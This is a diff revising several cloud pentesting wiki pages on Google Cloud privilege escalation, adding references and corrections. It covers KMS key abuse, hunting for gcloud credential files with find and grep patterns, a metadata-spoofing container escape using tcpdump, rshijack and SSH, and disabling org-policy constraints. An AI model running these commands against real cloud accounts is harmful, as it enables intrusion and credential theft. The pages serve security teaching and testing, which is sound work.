+    --keyring=[KEYRING_NAME] \
+    --key=[KEY_NAME] \
+    --ciphertext-file=[ENCRYPTED_FILE_PATH] \
+    --plaintext-file=[DECRYPTED_FILE_PATH]
+```
+
+For an asymmetric-encryption key version, use this valid versioned variant:<sup>[[8]](#references)[[11]](#references)</sup>
+
+```bash
+gcloud kms asymmetric-decrypt \
     --location=[LOCATION] \
     --keyring=[KEYRING_NAME] \
     --key=[KEY_NAME] \
@@ -32,7 +43,7 @@ gcloud kms decrypt \
 
 ### `cloudkms.cryptoKeys.setIamPolicy`
 
-An attacker with this permission could **give himself permissions** to use the key to decrypt information.
+An attacker with this permission could **give himself permissions** to use the key to decrypt information by adding a binding for a principal they control.<sup>[[2]](#references)[[4]](#references)[[10]](#references)</sup>
 
 <details><summary>Grant yourself KMS decrypter role</summary>
 
@@ -48,18 +59,22 @@ gcloud kms keys add-iam-policy-binding [KEY_NAME] \
 
 ### `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation`
 
-Here's a conceptual breakdown of how this delegation works:
+Cloud KMS documents this permission as enabling decrypt operations via other Google Cloud services, and the predefined `roles/cloudkms.cryptoKeyDecrypterViaDelegation` role grants it at CryptoKey scope.<sup>[[2]](#references)</sup>
+
+Here's a conceptual breakdown of how a service-mediated delegation flow works:
 
 1. **Service Account A** has direct access to decrypt using a specific key in KMS.
-2. **Service Account B** is granted the `useToDecryptViaDelegation` permission. This allows it to request KMS to decrypt data on behalf of Service Account A.
+2. **Service Account B** represents the service principal used by the integrated Google Cloud service and is granted the `useToDecryptViaDelegation` permission. The service can then request KMS to decrypt data on behalf of Service Account A.
 
-The usage of this **permission is implicit in the way that the KMS service checks permissions** when a decryption request is made.
+The usage of this **permission is implicit in the way that the KMS service checks permissions** when a delegated service request is made. A direct Cloud KMS `Decrypt` request is authorized with `cloudkms.cryptoKeyVersions.useToDecrypt`; the delegation permission is documented separately for decrypt operations through other Google Cloud services.<sup>[[2]](#references)[[9]](#references)</sup>
 
-When you make a standard decryption request using the Google Cloud KMS API (in Python or another language), the service **checks whether the requesting service account has the necessary permissions**. If the request is made by a service account with the **`useToDecryptViaDelegation`** permission, KMS verifies whether this **account is allowed to request decryption on behalf of the entity that owns the key**.
+When you make a standard decryption request using the Google Cloud KMS API (in Python or another language), the service checks whether the requesting service account has the necessary permissions. In an integrated service-mediated flow, KMS evaluates the delegation permission for the request made on behalf of the workload; `useToDecryptViaDelegation` is not a substitute for `useToDecrypt` on a direct `Decrypt` request.<sup>[[2]](#references)[[9]](#references)</sup>
 
 #### Setting Up for Delegation
 
-1. **Define the Custom Role**: Create a YAML file (e.g., `custom_role.yaml`) that defines the custom role. This file should include the `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation` permission. Here's an example of what this file might look like:
+The predefined delegation role is usually the simplest option. If a narrower custom role is required, `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation` is supported in custom roles and can be declared in the IAM YAML format below.<sup>[[2]](#references)[[5]](#references)[[6]](#references)</sup>
+
+1. **Define the Custom Role**: Create a YAML file (e.g., `custom_role.yaml`) that defines the custom role. This file should include the `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation` permission. Here's an example of what this file might look like:<sup>[[5]](#references)[[6]](#references)</sup>
 
 <details><summary>Custom role YAML definition</summary>
 
@@ -73,7 +88,7 @@ includedPermissions:
 
 </details>
 
-2. **Create the Custom Role Using the gcloud CLI**: Use the following command to create the custom role in your Google Cloud project:
+2. **Create the Custom Role Using the gcloud CLI**: Use the following command to create the custom role in your Google Cloud project.<sup>[[5]](#references)</sup>
 
 <details><summary>Create custom KMS role</summary>
 
@@ -85,17 +100,19 @@ Replace `[YOUR_PROJECT_ID]` with your Google Cloud project ID.
 
 </details>
 
-3. **Grant the Custom Role to a Service Account**: Assign your custom role to a service account that will be using this permission. Use the following command:
+3. **Grant the Custom Role to a Service Account**: Assign your custom role to a service account that will be using this permission. Use the following project-level IAM binding commands.<sup>[[7]](#references)</sup>
 
 <details><summary>Grant custom role to service account</summary>
 
 ```bash
 # Give this permission to the service account to impersonate
+# Grant the custom delegation role to the service account in the project.
 gcloud projects add-iam-policy-binding [PROJECT_ID] \
     --member "serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]" \
     --role "projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]"
 
 # Give this permission over the project to be able to impersonate any SA
+# Alternatively, grant the role in the project containing the KMS key.
 gcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \
     --member="serviceAccount:[SERVICE_ACCOUNT_EMAIL]" \
     --role="projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation"
@@ -105,7 +122,18 @@ Replace `[YOUR_PROJECT_ID]` and `[SERVICE_ACCOUNT_EMAIL]` with your project ID a
 
 </details>
 
+## References
+
+- [1] [Access control with IAM | Cloud Key Management Service](https://docs.cloud.google.com/kms/docs/iam)
+- [2] [Permissions and roles | Cloud Key Management Service](https://docs.cloud.google.com/kms/docs/reference/permissions-and-roles)
+- [3] [gcloud kms decrypt | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/kms/decrypt)
+- [4] [gcloud kms keys add-iam-policy-binding | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/kms/keys/add-iam-policy-binding)
+- [5] [Create and manage custom roles | IAM | Google Cloud](https://docs.cloud.google.com/iam/docs/creating-custom-roles)
+- [6] [Support levels for permissions in custom roles | IAM | Google Cloud](https://docs.cloud.google.com/iam/docs/custom-roles-permissions-support)
+- [7] [gcloud projects add-iam-policy-binding | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/projects/add-iam-policy-binding)
+- [8] [gcloud kms asymmetric-decrypt | Google Cloud SDK](https://docs.cloud.google.com/sdk/gcloud/reference/kms/asymmetric-decrypt)
+- [9] [Method: cryptoKeys.decrypt | Cloud Key Management Service](https://docs.cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt)
+- [10] [Method: cryptoKeys.setIamPolicy | Cloud Key Management Service](https://docs.cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/setIamPolicy)
+- [11] [Encrypting and decrypting data with an asymmetric key | Cloud Key Management Service](https://docs.cloud.google.com/kms/docs/encrypt-decrypt-rsa)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
@@ -1,28 +1,26 @@
 # GCP - local privilege escalation ssh pivoting
 
-{{#include ../../../banners/hacktricks-training.md}}
+In this scenario, suppose that you **have compromised a non-privileged account** inside a VM in a Compute Engine project.
 
-in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project.
-
-Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
+GCP permissions available through the attached Compute Engine service account may provide paths to **local privilege escalation or SSH access**. The practical result depends on the service account's IAM roles and, for OAuth requests from the VM, its access scopes; both can constrain the API call. <sup>[[1]](#references)[[4]](#references)</sup>
 
 ## Read the scripts <a href="#follow-the-scripts" id="follow-the-scripts"></a>
 
-**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts.
+**Compute Engine instances** commonly execute scripts that perform actions with their attached service accounts. <sup>[[1]](#references)[[4]](#references)</sup>
 
-As IAM is go granular, an account may have **read/write** privileges over a resource but **no list privileges**.
+IAM is granular, so an account may have **read/write** privileges over a named resource but **no permission to enumerate resources**. <sup>[[1]](#references)[[5]](#references)</sup>
 
-A great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`.
+A useful hypothetical example is a Compute Engine instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`. <sup>[[1]](#references)</sup>
 
-Running `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission. However, if you ran `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks.
+Running `gsutil ls` without a bucket name requires `storage.buckets.list`, so it can fail even when the service account can access a known bucket. If you run `gsutil ls gs://instance82736-long-term-xyz-archive-0332893`, the request instead targets that bucket and may list its objects when the account has the relevant object permissions, potentially exposing a filesystem backup that the local Linux account cannot read. <sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
 
-You may be able to find this bucket name inside a script (in bash, Python, Ruby...).
+You may be able to find this bucket name inside a script (in Bash, Python, Ruby, or another language). <sup>[[1]](#references)</sup>
 
 ## Custom Metadata
 
-Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the **instance** and **project level**. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
+Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the **instance** and **project level**. Custom metadata passes **arbitrary key/value pairs** to VMs and is commonly used to parameterize startup and shutdown scripts. <sup>[[2]](#references)</sup>
 
-Moreover, it's possible to add **userdata**, which is a script that will be **executed everytime** the machine is started or restarted and that can be **accessed from the metadata endpoint also.**
+Compute Engine calls boot-time scripts **startup scripts**, rather than `userdata`. A startup script stored in metadata is read by the guest environment and executed when the VM boots; metadata values can also be queried from the VM's metadata server. <sup>[[2]](#references)[[3]](#references)</sup>
 
 For more info check:
 
@@ -32,9 +30,11 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
 
 ## **Abusing IAM permissions**
 
-Most of the following proposed permissions are **given to the default Compute SA,** the only problem is that the **default access scope prevents the SA from using them**. However, if **`cloud-platform`** **scope** is enabled or just the **`compute`** **scope** is enabled, you will be **able to abuse them**.
+The following permissions can enable local escalation or SSH access when granted to the attached service account. IAM roles determine which API permissions the account has, while access scopes can further limit OAuth requests; the `cloud-platform` scope does not grant IAM permissions by itself. Google recommends using that scope and enforcing least-privilege access through IAM roles. <sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
-Check the following permissions:
+Do not assume that a default Compute Engine service account has these permissions: its roles depend on the project's organization-policy and IAM configuration. <sup>[[4]](#references)</sup>
+
+Check the following permissions and the linked exploitation notes: <sup>[[5]](#references)</sup>
 
 - [**compute.instances.osLogin**](gcp-compute-privesc/index.html#compute.instances.oslogin)
 - [**compute.instances.osAdminLogin**](gcp-compute-privesc/index.html#compute.instances.osadminlogin)
@@ -44,7 +44,7 @@ Check the following permissions:
 
 ## Search for Keys in the filesystem
 
-Check if other users have loggedin in gcloud inside the box and left their credentials in the filesystem:
+Check whether other users have logged in to `gcloud` inside the VM and left sensitive credential artifacts in the filesystem. Current ADC files and gcloud's credential store differ from legacy paths, so inspect both where applicable. <sup>[[1]](#references)[[8]](#references)[[9]](#references)</sup>
 
 <details><summary>Search for gcloud credentials in filesystem</summary>
 
@@ -57,11 +57,14 @@ sudo find / -name "gcloud"
 These are the most interesting files:
 
 - `~/.config/gcloud/credentials.db`
-- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json`
-- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto`
-- `~/.credentials.json`
+- `~/.config/gcloud/application_default_credentials.json`
+- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json` (legacy ADC)
+- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto` (legacy `gsutil`)
+- `~/.credentials.json` (legacy gcloud installations)
 
-### More API Keys regexes
+### More API key regexes
+
+The following patterns are heuristics; review matches securely before using any recovered material.
 
 <details><summary>Grep patterns for GCP credentials and keys</summary>
 
@@ -101,9 +104,14 @@ grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
 
 ## References
 
-- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [1] [Google Cloud privilege escalation & post-exploitation tactics](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [2] [About VM metadata | Compute Engine](https://docs.cloud.google.com/compute/docs/metadata/overview)
+- [3] [About startup scripts | Compute Engine](https://docs.cloud.google.com/compute/docs/instances/startup-scripts)
+- [4] [Service accounts | Compute Engine](https://docs.cloud.google.com/compute/docs/access/service-accounts)
+- [5] [Compute Engine IAM roles and permissions](https://docs.cloud.google.com/compute/docs/access/iam)
+- [6] [IAM permissions for gcloud storage commands | Cloud Storage](https://docs.cloud.google.com/storage/docs/access-control/iam-gcloud)
+- [7] [List objects | Cloud Storage](https://docs.cloud.google.com/storage/docs/listing-objects)
+- [8] [How Application Default Credentials works | Authentication](https://docs.cloud.google.com/docs/authentication/application-default-credentials)
+- [9] [The gcloud CLI and p12 service account keys | Google Cloud SDK](https://docs.cloud.google.com/sdk/crypto)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
@@ -1,35 +1,40 @@
 # GCP - Generic Permissions Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Generic Interesting Permissions
 
 ### \*.setIamPolicy
 
-If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\
-This permission can also allow to **escalate to other principals** if the resource allow to execute code and the `iam.ServiceAccounts.actAs` is not necessary.
+If a principal has a resource's **`setIamPolicy`** permission, it can change that resource's IAM policy and grant itself additional access to the resource. The [IAM permissions reference](https://docs.cloud.google.com/iam/docs/permissions-reference) lists the resource-specific permissions; search for `setIamPolicy` to find services that expose this capability.<sup>[[1]](#references)</sup>
 
-- _cloudfunctions.functions.setIamPolicy_
-  - Modify the policy of a Cloud Function to allow yourself to invoke it.
+Changing a policy can also grant another principal permission to invoke a code-executing resource. If that resource already runs as a more privileged service account, the caller may reach that service-account-backed execution path without needing `iam.serviceAccounts.actAs` on the service account.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
-There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy.
+- **`cloudfunctions.functions.setIamPolicy`**
+  - Modify a Cloud Function's IAM policy to grant a principal invocation access. Use the generation-specific invocation role: 1st-gen functions use the Cloud Functions Invoker role, while 2nd-gen functions use the Cloud Run Invoker role.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ### \*.create, \*.update
 
-These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.
+A create/update permission is only a potential escalation primitive; by itself it does not grant an elevated identity. It becomes interesting when the target resource accepts an attached service account and the caller also has **`iam.serviceAccounts.actAs`** on that account. If the resource executes attacker-controlled code, creating or updating it can then cause that code to run as the attached service account.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ### \*ServiceAccount\*
 
-This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
+Permissions containing `ServiceAccount` are not interchangeable. A resource-specific permission such as **`compute.instances.setServiceAccount`** controls which service account a VM uses, while **`iam.serviceAccounts.actAs`** is a separate authorization check for attaching a service account to a supported resource. The escalation impact depends on the exact permission and on whether the caller can make the resource execute useful code or operations as that account.<sup>[[5]](#references)[[7]](#references)</sup>
 
-### iam.ServiceAccounts.actAs
+### `iam.serviceAccounts.actAs`
 
-This permission will let you attach a Service Account to a resource that supports it (e.g.: Compute Engine VM, Cloud Function, Cloud Run, etc).\
-If you can attach a Service Account that has more privileges than your user to a resource that can execute code, you will be able to escalate your privileges by executing code with that Service Account.
+Google requires **`iam.serviceAccounts.actAs`** when a principal attaches a service account to a supported resource; the service API also requires the permissions needed to create or update that resource. Examples include Compute Engine VMs, Cloud Functions, and Cloud Run workloads.<sup>[[2]](#references)[[5]](#references)[[7]](#references)</sup>
 
-Search in Cloud Hacktricks for `iam.ServiceAccounts.actAs` to find several examples of how to escalate privileges with this permission.
+If the attached service account has more privileges than the caller and the workload can execute attacker-controlled code, the workload's Google Cloud API calls run under that service account's identity, creating a privilege-escalation path. Check the target account's permissions, the workload's execution model, and any invocation controls for the specific service.<sup>[[2]](#references)[[4]](#references)[[6]](#references)</sup>
+
+For service-specific examples, search this book for `iam.serviceAccounts.actAs`.
+
+## References
+
+- [1] [IAM permissions reference | Google Cloud Documentation](https://docs.cloud.google.com/iam/docs/permissions-reference)
+- [2] [Cloud Functions IAM permissions | Google Cloud Documentation](https://cloud.google.com/functions/docs/reference/iam/permissions)
+- [3] [Cloud Functions IAM roles | Google Cloud Documentation](https://cloud.google.com/functions/docs/reference/iam/roles)
+- [4] [Authorize access with IAM | Cloud Run functions](https://cloud.google.com/functions/docs/securing/managing-access-iam)
+- [5] [Requiring permission to attach service accounts to resources](https://docs.cloud.google.com/iam/docs/service-accounts-actas)
+- [6] [Introduction to service identity | Cloud Run](https://docs.cloud.google.com/run/docs/securing/service-identity)
+- [7] [Service accounts | Compute Engine](https://docs.cloud.google.com/compute/docs/access/service-accounts)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
@@ -1,34 +1,32 @@
 # GCP - Network Docker Escape
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Initial State
 
-In both writeups where this technique is specified, the attackers managed to get **root** access inside a **Docker** container managed by GCP with access to the host network (and the capabilities **`CAP_NET_ADMIN`** and **`CAP_NET_RAW`**).
+The two research reports describing this technique started with root access in a Docker container, host-network access, and the **`CAP_NET_ADMIN`** and **`CAP_NET_RAW`** capabilities. The shared network namespace exposed the host's network traffic from the container. <sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Attack Explanation
 
-On a Google Compute Engine instance, regular inspection of network traffic reveals numerous **plain HTTP requests** to the **metadata instance** at `169.254.169.254`. The [**Google Guest Agent**](https://github.com/GoogleCloudPlatform/guest-agent), an open-source service, frequently makes such requests.
+The reports observed a Google Compute Engine host making plain HTTP requests to the metadata server at `169.254.169.254`, including requests from the Google Guest Agent. Google documents this address as the IPv4 metadata-server endpoint. <sup>[[1]](#references)[[4]](#references)</sup>
 
-This agent is designed to **monitor changes in the metadata**. Notably, the metadata includes a **field for SSH public keys**. When a new public SSH key is added to the metadata, the agent automatically **authorizes** it in the `.authorized_key` file. It may also **create a new user** and add them to **sudoers** if needed.
+On Linux instances where OS Login is not enabled, the guest agent uses metadata to create and manage local user accounts and their SSH keys. It maintains each managed user's `authorized_keys` file and adds provisioned users to the `google-sudoers` group, whose members receive `sudo` permissions. <sup>[[3]](#references)</sup>
 
-The agent monitors changes by sending a request to **retrieve all metadata values recursively** (`GET /computeMetadata/v1/?recursive=true`). This request is designed to prompt the metadata server to send a response only if there's any change in the metadata since the last retrieval, identified by an Etag (`wait_for_change=true&last_etag=`). Additionally, a **timeout** parameter (`timeout_sec=`) is included. If no change occurs within the specified timeout, the server responds with the **unchanged values**.
+The guest agent watches for metadata changes with a recursive request such as `GET /computeMetadata/v1/?recursive=true&wait_for_change=true&last_etag=<ETAG>`. The metadata service can hold the request until a change occurs; `last_etag` makes a matching ETag eligible to wait, while a mismatching ETag causes the latest value to be returned immediately. A caller can also set `timeout_sec`, after which the current metadata is returned. <sup>[[1]](#references)[[4]](#references)</sup>
 
-This process allows the **IMDS** (Instance Metadata Service) to respond after **60 seconds** if no configuration change has occurred, creating a potential **window for injecting a fake configuration response** to the guest agent.
+In the reported setup, the request used a 60-second timeout, creating a race window in which a forged metadata response could be injected before the genuine response. The timeout is request-controlled rather than a universal 60-second metadata-server default. <sup>[[1]](#references)[[2]](#references)[[4]](#references)</sup>
 
-An attacker could exploit this by performing a **Man-in-the-Middle (MitM) attack**, spoofing the response from the IMDS server and **inserting a new public key**. This could enable unauthorized SSH access to the host.
+An attacker who can inject packets into that HTTP connection can spoof a metadata response containing a new SSH public key. If the guest agent accepts the response, it can provision the named user and authorize the key, allowing SSH access to the host. <sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
+This is a historical technique demonstrated in the environments described by the reports. It depends on the host-network and packet-injection prerequisites above, metadata-based SSH authorization, and an HTTP metadata connection that can be raced. Google's current documentation also describes an HTTPS metadata endpoint for Shielded VMs and HTTPS-MDS credentials enabled by default for newer guest-agent versions, so the target's metadata transport and guest-agent configuration must be verified before applying this exact HTTP technique. <sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ### Escape Technique
 
-While ARP spoofing is ineffective on Google Compute Engine networks, a [**modified version of rshijack**](https://github.com/ezequielpereira/rshijack) developed by [**Ezequiel**](https://www.ezequiel.tech/2020/08/dropping-shell-in.html) can be used for packet injection in the communication to inject the SSH user.
+The researchers reported that ARP spoofing did not work on Google Compute Engine networks, so they used a modified version of `rshijack` to inject a TCP response into the metadata connection. The patch adds required `seq` and `ack` command-line arguments, allowing the response to be crafted from values observed in the live connection. <sup>[[1]](#references)[[5]](#references)</sup>
 
-This version of rshijack allows inputting the ACK and SEQ numbers as command-line arguments, facilitating the spoofing of a response before the real Metadata server response. Additionally, a [**small Shell script**](https://gist.github.com/ezequielpereira/914c2aae463409e785071213b059f96c#file-fakedata-sh) is used to return a **specially crafted payload**. This payload triggers the Google Guest Agent to **create a user `wouter`** with a specified public key in the `.authorized_keys` file.
+The payload script used in the research returns a forged metadata document with an SSH key and accepts the observed ETag as its argument. Reusing the ETag keeps the real metadata server from immediately treating the forged document as a changed value on the next poll, preserving the timeout window. <sup>[[1]](#references)[[4]](#references)[[6]](#references)</sup>
 
-The script uses the same ETag to prevent the Metadata server from immediately notifying the Google Guest Agent of different metadata values, thereby delaying the response.
+To reproduce the packet-injection sequence in a matching, authorized test environment:
 
-To execute the spoofing, the following steps are necessary:
-
-1. **Monitor requests to the Metadata server** using **tcpdump**:
+1. **Monitor requests to the metadata server** with **tcpdump**. The research report used the following capture filter: <sup>[[1]](#references)</sup>
 
 <details>
 <summary>Monitor metadata server requests with tcpdump</summary>
@@ -39,7 +37,7 @@ tcpdump -S -i eth0 'host 169.254.169.254 and port 80' &
 
 </details>
 
-Look for a line similar to:
+   Look for a request containing the timeout, ETag, recursive, and wait-for-change parameters. The report shows a line in this form: <sup>[[1]](#references)</sup>
 
 <details>
 <summary>Example tcpdump output line</summary>
@@ -50,10 +48,10 @@ Look for a line similar to:
 
 </details>
 
-2. Send the fake metadata data with the correct ETAG to rshijack:
+2. **Send the forged metadata response** to the modified `rshijack`, using the captured ETag, sequence, and acknowledgment values. The original research used the following command: <sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
 <details>
-<summary>Send fake metadata and SSH to host</summary>
+<summary>Send forged metadata and SSH to the host</summary>
 
 ```bash
 fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost
@@ -61,14 +59,15 @@ fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARG
 
 </details>
 
-This step authorizes the public key, enabling SSH connection with the corresponding private key.
+If the forged response is accepted and the target uses metadata-based SSH authorization, the public key is written for `wouter`; the corresponding private key can then be used to connect and obtain the host-level privileges available to that account. <sup>[[1]](#references)[[2]](#references)[[3]](#references)[[6]](#references)</sup>
 
 ## References
 
-- [https://www.ezequiel.tech/2020/08/dropping-shell-in.html](https://www.ezequiel.tech/2020/08/dropping-shell-in.html)
-- [https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)
+- [1] [How to contact Google SRE: Dropping a shell in Cloud SQL](https://www.ezequiel.tech/2020/08/dropping-shell-in.html)
+- [2] [The cloud has an isolation problem: PostgreSQL vulnerabilities affect multiple cloud vendors](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)
+- [3] [Guest agent functionality | Compute Engine](https://docs.cloud.google.com/compute/docs/images/guest-agent-functions)
+- [4] [View and query VM metadata | Compute Engine](https://docs.cloud.google.com/compute/docs/metadata/querying-metadata)
+- [5] [Modified to receive SEQ and ACK numbers as command-line parameters](https://github.com/kpcyrd/rshijack/commit/e3c797db372030b3b18f85913be264cf8a361db3)
+- [6] [Payload script used for Google VRP research](https://gist.github.com/ezequielpereira/914c2aae463409e785071213b059f96c)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
@@ -1,12 +1,12 @@
 # GCP - Orgpolicy Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## orgpolicy
 
 ### `orgpolicy.policy.set`
 
-An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected.
+An attacker with **`orgpolicy.policy.set`** can update organization policies and turn off guardrails that block otherwise permitted operations. This permission is required to call the Organization Policy `setOrgPolicy` method, and disabling a boolean constraint can reopen the blocked operation.<sup>[[1]](#references)[[7]](#references)</sup>
+
+For example, **`constraints/appengine.disableCodeDownload`** disables downloads of source code previously uploaded to App Engine. If enforced, an attacker who can change the policy can disable enforcement and then download that source code.<sup>[[1]](#references)[[3]](#references)</sup>
 
 <details>
 <summary>Get org policy info and disable enforcement</summary>
@@ -21,13 +21,15 @@ gcloud resource-manager org-policies disable-enforce <org-policy> [--folder <id>
 
 </details>
 
-A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
+The `describe` command can show a policy at folder, organization, or project scope, while `disable-enforce` turns off enforcement of a boolean constraint at that resource.<sup>[[4]](#references)[[5]](#references)</sup>
+
+A Python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).<sup>[[2]](#references)</sup>
 
 ### `orgpolicy.policy.set`, `iam.serviceAccounts.actAs`
 
-uusally it's not possible to attach a service account from a different project to a resource becasue there is a policy constraint enforced named **`iam.disableCrossProjectServiceAccountUsage`** that prevents this action.
+Normally, a service account in one project cannot be attached to a resource in another project when its project enforces **`iam.disableCrossProjectServiceAccountUsage`**. This constraint is enforced by default and is configured on the project containing the service account.<sup>[[6]](#references)</sup>
 
-It's possible to verify if this constraint is enforced by running the following command:
+Use the `--effective` flag to inspect the inherited policy for the project containing the service account.<sup>[[4]](#references)[[6]](#references)</sup>
 
 <details>
 <summary>Verify cross-project service account constraint</summary>
@@ -45,9 +47,9 @@ constraint: constraints/iam.disableCrossProjectServiceAccountUsage
 
 </details>
 
-This prevents an attacker from abusing the permission **`iam.serviceAccounts.actAs`** to impersonate a service account from another project without needed further infra permissions to start a new VM for example, which could lead to privilege escalation.
+The permission **`iam.serviceAccounts.actAs`** is required to attach a service account to a resource, and code running on that resource uses the attached service account as its identity. An attacker who already has the permissions needed to create a resource, such as a VM, may therefore use a cross-project privileged service account for escalation if this constraint is not enforced; the constraint blocks that attachment path.<sup>[[6]](#references)</sup>
 
-However, an attacker with the permissions **`orgpolicy.policy.set`** can bypass this restriction by disabling the constraint **`iam.disableServiceAccountProjectWideAccess`**. This allows the attacker to attach a service account from another project to a resource in his own project, effectively escalating his privileges.
+An attacker with **`orgpolicy.policy.set`** can bypass this restriction by disabling **`iam.disableCrossProjectServiceAccountUsage`** in the project containing the service account. This re-enables attaching that service account to a resource in another project, potentially escalating privileges when the attacker also has **`iam.serviceAccounts.actAs`** and resource-creation permissions.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 <details>
 <summary>Disable cross-project service account constraint</summary>
@@ -55,16 +57,19 @@ However, an attacker with the permissions **`orgpolicy.policy.set`** can bypass 
 ```bash
 gcloud resource-manager org-policies disable-enforce \
   iam.disableCrossProjectServiceAccountUsage \
-  --project=<project-id>
+  --project=<service-account-project-id>
 ```
 
 </details>
 
 ## References
 
-- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+- [1] [Privilege Escalation in Google Cloud Platform - Part 2 (Non-IAM) - Rhino Security Labs](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+- [2] [orgpolicy.policy.set.py - Rhino Security Labs](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py)
+- [3] [Organization policy constraints - Google Cloud Documentation](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)
